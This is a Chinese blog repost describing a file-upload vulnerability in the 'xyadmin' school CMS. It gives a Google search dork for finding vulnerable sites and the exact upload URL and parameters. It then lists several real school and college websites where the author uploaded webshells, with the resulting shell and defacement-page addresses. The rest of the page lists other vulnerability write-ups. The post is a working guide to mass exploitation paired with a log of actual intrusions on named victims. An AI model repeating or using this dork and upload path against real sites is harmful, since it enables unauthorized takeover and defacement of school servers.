由校园网CMS系统(xyadmin)上传漏洞想到的

最新推荐文章于 2023-10-13 09:56:18 发布
最新推荐文章于 2023-10-13 09:56:18 发布
阅读量349 收藏
点赞数
文章标签: shell
原文链接:http://www.cnblogs.com/94YY/archive/2011/05/28/2060455.html
版权
由校园网CMS系统(xyadmin)上传漏洞想到的
2009-09-27 04:27

校园网CMS系统(xyadmin)上传漏洞
google关键字:inurl:xyadmin
我们的工具还是g.cn   google hack
我们随便点一个连接看看
这个是上传页面xyadmin/situjiaduotu.asp?formname=baseinfoform&editname=logol&uppath=baseinfo&filelx=.swf.gif.jpg
传马拿shell
xyadmin是校园的缩写
那么其他的如xxadmin可否呢?
http://rnx.tjuci.edu.cn/xyadmin/situjiaduotu.asp?formname=baseinfoform&editname=logol&uppath=baseinfo&filelx=.swf.gif.jpg

window.opener.document.baseinfoform.logol.value='xyadmin/baseinfo/sam美化实用免杀大马.asp'
window.alert("文件上传成功!请不要修改生成的链接地址!");
window.close();
http://www.dslsxx.cn/xyadmin/situjiaduotu.asp?formname=baseinfoform&editname=logol&uppath=baseinfo&filelx=.swf.gif.jpg
shell地址http://www.dslsxx.cn/xyadmin/baseinfo/conn.asp
黑页http://www.dslsxx.cn/conn.asp
74126b7bb02215c12e73b3ab.jpg

http://www.hnaues.com/sutuo/xyadmin/situjiaduotu.asp?formname=baseinfoform&editname=logol&uppath=baseinfo&filelx=.swf.gif.jpg
遇到
window.alert("文件上传成功!请不要修改生成的链接地址!");
window.close();
找不到路径~~~

http://jpkc.aqvtc.cn:8081/xyadmin/situjiaduotu.asp?formname=baseinfoform&editname=logol&uppath=baseinfo&filelx=.swf.gif.jpg
window.opener.document.baseinfoform.logol.value=
'xyadmin/baseinfo/conn.asa'
window.alert("文件上传成功!请不要修改生成的链接地址!");
window.close();
http://jpkc.aqvtc.cn:8081这个网站
http://jpkc.aqvtc.cn:8081/xyadmin/baseinfo/conn.asa
黑页http://jpkc.aqvtc.cn:8081/conn.asp

2733eb01826565abe950cdab.jpg

http://www.hssxfl.com/xyadmin/situjiaduotu.asp?formname=baseinfoform&editname=logol&uppath=baseinfo&filelx=.swf.gif.jpg
http://www.lbkjb.com/xyadmin/situjiaduotu.asp?formname=baseinfoform&editname=logol&uppath=baseinfo&filelx=.swf.gif.jpg
window.opener.document.baseinfoform.logol.value=
'xyadmin/baseinfo/conn.asa'
window.alert("文件上传成功!请不要修改生成的链接地址!");
window.close();
shell地址http://www.lbkjb.com/xyadmin/baseinfo/conn.asa
黑页地址http://www.lbkjb.com/EDW.asp

5ad9a01e51a3c826304e15ab.jpg

转载于:https://www.cnblogs.com/94YY/archive/2011/05/28/2060455.html

dgt93504
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
兰德网络-O2OA系统存在默认口令漏洞
nnn2188185的博客
04-12 734
浙江兰德纵横网路技术股份有限公司O2OA系统存在默认口令漏洞
74cms代码执行漏洞
01-03
74cms代码执行漏洞 docker
ThinkCMF X2.2.2漏洞复现
xu_1234567的博客
09-12 395
1.搭建环境 下载ThinkCMF X2.2.2文件,把文件放入网站目录下,打开网站,按照提示一步步进行安装。(thinkCMF安装包,百度搜索获取) 2.漏洞概述 攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。 3.漏洞利用 通过构造a参数的fetch方法,可以不需要知道文件路径就可以把php代码写入文件,下面将把PHP查看配置函数phpinfo()写入test.php文件 phpinfo版payload如下 ?a=fetch&templateFile=p
ThinkCMF X2.2.2漏洞的复现
摸鱼的博客
09-12 668
一、漏洞描述ThinkCMF X2.2.2 ThinkCMF X2.2.2 二、漏洞危害 远程攻击者在无需任何权限情况下,通过构造特定的请求包即可在远程服务器上执行任意代码 三、环境搭建 ThinkCMF X2.2.2 下载:https://github.com/SaltNego/much_tools 四、漏洞复现 访问目标网站,如下图所示: 输入payload:payload:?a=fetch&templateFile=public/index&prefix=’’&cont
django xadmin 默认密码_Django重置密码漏洞(CVE201919844)复现和分析
weixin_39611161的博客
11-24 1794
前言CVE-2019-19844是Django重置密码功能的一个漏洞。Django的密码重置表单使用不区分大小写的查询来获取输入的邮箱地址对应的账号。一个知道邮箱地址和账号对应关系的攻击者可以精心构造一个和该账号邮箱地址不同,但经过Unicode大小写转换后相同的邮箱地址,来接收该账户的密码重置邮件,从而实现账户劫持的攻击目标。本文较为详细地记录了该漏洞的复现过程,简要分析了漏洞成因,讨...
xadmin(0.6.1)使用过程中bug发现及解决方式
bocai_xiaodaidai的博客
07-04 2381
1、list_filter设置外键字段时,显示bug 在list_filter中加入department__name(外键名__字段名) class InterviewAdmin(object): ... list_filter = ('status', 'department__name', 'final_result') ... 会在过滤器中出现如下显示bug(...
CMS:校园管理系统
03-11
**CMS:校园管理系统详解** CMS,全称Content Management System,通常指的是内容管理系统,但在本场景中,它被用于构建一个特定的应用——“校园管理系统”。这个系统的目标是为学校提供一个全面、高效的管理平台...
74CMS 3.0 SQL注入漏洞后台.docx
07-07
74CMS 3.0 SQL 注入漏洞后台 本节将对 74CMS 3.0 SQL 注入漏洞后台进行详细分析,首先介绍了攻击环境的搭建,然后对代码进行了详细的审计,最后对漏洞进行了分析。 一、搭建攻击环境 为了进行攻击,我们需要搭建...
CSZ CMS 1.2.X sql注入漏洞
09-07
# (CVE-2019-13086)CSZ CMS 1.2.Xsql注入漏洞 ## 一、漏洞简介 CSZ CMS是一套基于PHP的开源内容管理系统CMS)。 CSZ CMS 1.2.X版本(2019-06-20之前)中的core/MY_Security.php文件存在SQL注入漏洞。该漏洞...
DreamerCMS(梦想家CMS内容管理系统)史上最精简的CMS系统
05-08
Dreamer CMS 梦想家内容发布系统采用流行的SpringBoot搭建,支持静态化、标签化建站。不需要专业的后台开发技能,会HTML就能建站,上手超简单;只需使用系统提供的标签就能轻松建设网站。全面支持各类表单字段,真正...
X-admin-v2.2.rar
08-15
X-admin是一个基于layui的轻量级前端后台管理框架,简单免费,兼容性好,面向所有层次的前后端程序。创立于2017年初,为了敏捷WEB应用开发和简化企业应用开发而诞生的。X-admin从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多的原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进,已经成长为国内最领先和最具影响力的WEB应用开发前端后台框架,众多的典型案例确保可以稳定用于商业以及门户级的开发。 商业友好的开源协议 X-admin遵循Apache2开源协议发布。Apache Licence是著名的非盈利开源组织Apache采用的协议。该协议和BSD类似,鼓励代码共享和尊重原作者的著作权,同样允许代码修改,再作为开源或商业软件发布。
xycms add_book.php sql注入漏洞1
08-03
漏洞简介:XYCMS原名为南京XYCMS企业建站系统,所设计的版本分为动态版和静态版。这里发现 reply_content 里面的参数没有进行任何过滤,直接po
yx-blog
03-14
个人博客 使用静态网站生成器内置。 安装 $ npm install 本地开发 $ npm start 建造 $ npm run build
x-admin+TP5 后台搭建学习
01-14
用x-admin后台模板+ThinkPHP5.0+mysql,学习搭建的网站后台管理系统,需要的可以下载优化改进
【渗透实战系列】xycms的一次漏洞挖掘
最新发布
书山上的云的博客
10-13 722
本次漏洞挖掘是用于记录某次实验中自建CMS靶场的漏洞挖掘情况。
第5章 通过xadmin快速搭建后台管理系统
热门推荐
小旋锋 的博客
05-30 2万+
慕课网《强力django+杀手级xadmin 打造上线标准的在线教育平台》 学习笔记 本章主要内容: 通过xadmin结合第4章设计的model快速的搭建一套完整的后台管理系统; 本章首先介绍django admin的简单使用, 然后引出xadmin,在安装xadmin之后将model注册到xadmin中, 最后完成xadmin的全局配置
导出为CSV文件的类
山高人为峰!
05-24 554
using System;using System.Collections.Generic;using System.IO;using System.Text;using System.Data;namespace Utility{  public class CSVHelper  {  //导出为svc文件,strFileName为要导出的csv格式文件的路径和文件名:比如,"d:/test/t
鱼跃CMS审计-后台多处文件上传1
08-03
鱼跃CMS审计-后台多处文件上传1是一篇关于网络安全领域的技术文章,主要关注于对一款名为鱼跃CMS系统进行安全审计,特别是在后台文件上传功能的漏洞挖掘与分析。作者在文章中分享了他们在审计过程中遇到的问题和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值